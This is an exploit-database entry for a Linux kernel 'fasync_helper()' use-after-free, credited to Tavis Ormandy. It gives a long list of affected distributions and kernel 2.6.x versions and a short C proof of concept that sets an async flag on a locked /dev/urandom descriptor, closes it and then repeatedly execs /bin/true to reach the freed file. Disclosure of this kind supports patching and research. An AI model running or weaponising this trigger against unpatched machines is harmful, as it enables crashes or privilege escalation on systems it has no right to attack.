Linux Kernel 'fasync_helper()' Local Privilege Escalation Vulnerability

2010-03-17T00:00:00
ID 1337DAY-ID-11343
Type zdt
Reporter Tavis Ormandy
Modified 2010-03-17T00:00:00

Description

Exploit for linux platform in category local exploits

                                        
                                            =======================================================================
Linux Kernel 'fasync_helper()' Local Privilege Escalation Vulnerability
=======================================================================

Credit:  	 Tavis Ormandy
Vulnerable: 	Ubuntu Ubuntu Linux 9.10 sparc
Ubuntu Ubuntu Linux 9.10 powerpc
Ubuntu Ubuntu Linux 9.10 lpia
Ubuntu Ubuntu Linux 9.10 i386
Ubuntu Ubuntu Linux 9.10 amd64
Ubuntu Ubuntu Linux 9.04 sparc
Ubuntu Ubuntu Linux 9.04 powerpc
Ubuntu Ubuntu Linux 9.04 lpia
Ubuntu Ubuntu Linux 9.04 i386
Ubuntu Ubuntu Linux 9.04 amd64
Ubuntu Ubuntu Linux 8.10 sparc
Ubuntu Ubuntu Linux 8.10 powerpc
Ubuntu Ubuntu Linux 8.10 lpia
Ubuntu Ubuntu Linux 8.10 i386
Ubuntu Ubuntu Linux 8.10 amd64
Ubuntu Ubuntu Linux 8.04 LTS sparc
Ubuntu Ubuntu Linux 8.04 LTS powerpc
Ubuntu Ubuntu Linux 8.04 LTS lpia
Ubuntu Ubuntu Linux 8.04 LTS i386
Ubuntu Ubuntu Linux 8.04 LTS amd64
Ubuntu Ubuntu Linux 6.06 LTS sparc
Ubuntu Ubuntu Linux 6.06 LTS powerpc
Ubuntu Ubuntu Linux 6.06 LTS i386
Ubuntu Ubuntu Linux 6.06 LTS amd64
S.u.S.E. openSUSE 11.2
RedHat Fedora 11
RedHat Enterprise Linux Desktop 5 client
RedHat Enterprise Linux 5.3.z server
RedHat Enterprise Linux 5 server
Linux kernel 2.6.32
Linux kernel 2.6.31 5
Linux kernel 2.6.31 .2
Linux kernel 2.6.31 .11
Linux kernel 2.6.31 -rc7
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.31 -rc6
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.31 -rc3
Linux kernel 2.6.31 -rc1
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.31
Linux kernel 2.6.30 .1
Linux kernel 2.6.30 -rc6
Linux kernel 2.6.30 -rc5
Linux kernel 2.6.30 -rc3
Linux kernel 2.6.30 -rc2
Linux kernel 2.6.30 -rc1
Linux kernel 2.6.30
Linux kernel 2.6.29 .4
Linux kernel 2.6.29 .1
Linux kernel 2.6.29 -git8
Linux kernel 2.6.29 -git14
Linux kernel 2.6.29 -git1
Linux kernel 2.6.29
Linux kernel 2.6.28 .9
Linux kernel 2.6.28 .8
Linux kernel 2.6.28 .6
Linux kernel 2.6.28 .5
Linux kernel 2.6.28 .3
Linux kernel 2.6.28 .2
Linux kernel 2.6.28 .1
Linux kernel 2.6.28 -rc7
Linux kernel 2.6.28 -rc5
Linux kernel 2.6.28 -rc1
Linux kernel 2.6.28 -git7
Linux kernel 2.6.28
Linux kernel 2.6.33-rc4
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.32-rc8
Linux kernel 2.6.32-rc7
Linux kernel 2.6.32-rc5
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.32-rc4
Linux kernel 2.6.32-rc3
Linux kernel 2.6.32-rc2
Linux kernel 2.6.32-rc1
Linux kernel 2.6.31.6
Linux kernel 2.6.31.4
Linux kernel 2.6.31.2
Linux kernel 2.6.31.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.31-rc9
Linux kernel 2.6.31-rc8
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.31-rc7
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.31-rc5-git3
Linux kernel 2.6.31-rc4
Linux kernel 2.6.31-rc2
Linux kernel 2.6.31-git11
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.30.5
Linux kernel 2.6.30.4
Linux kernel 2.6.30.3
Linux kernel 2.6.29-rc2-git1
Linux kernel 2.6.29-rc2
Linux kernel 2.6.29-rc1
Linux kernel 2.6.28.4
Linux kernel 2.6.28.10
Avaya Voice Portal 5.0
Avaya Aura System Platform 1.1
Avaya Aura System Manager 5.2
Avaya Aura SIP Enablement Services 5.2.1
Avaya Aura SIP Enablement Services 5.2
Avaya Aura Session Manager 5.2
Avaya Aura Session Manager 1.1
Avaya Aura Communication Manager 5.2
Avaya Aura Application Enablement Services 5.2

#ifndef _GNU_SOURCE
# define _GNU_SOURCE
#endif
#include <stdio.h>
#include <unistd.h>
#include <stdint.h>
#include <stdbool.h>
#include <fcntl.h>
#include <stdlib.h>
#include <assert.h>
#include <asm/ioctls.h>

// Testcase for locked async fd bug -- taviso 16-Dec-2009
int main(int argc, char **argv)
{
    int fd;
    pid_t child;
    unsigned flag = ~0;

    fd = open("/dev/urandom", O_RDONLY);

    // set up exclusive lock, but dont block
    flock(fd, LOCK_EX | LOCK_NB);

    // set ASYNC flag on descriptor
    ioctl(fd, FIOASYNC, &flag);

    // close the file descriptor to trigger the bug
    close(fd);

    // now exec some stuff to populate the AT_RANDOM entries, which will cause
    // the released file to be used.

    // This assumes /bin/true is an elf executable, and that this kernel
    // supports AT_RANDOM.
    do switch (child = fork()) {
            case  0: execl("/bin/true", "/bin/true", NULL);
                     abort();
            case -1: fprintf(stderr, "fork() failed, %m\n");
                     break;
            default: fprintf(stderr, ".");
                     break;
    } while (waitpid(child, NULL, 0) != -1);

    fprintf(stderr, "waitpid() failed, %m\n");
    return 1;
}




#  0day.today [2018-01-02]  #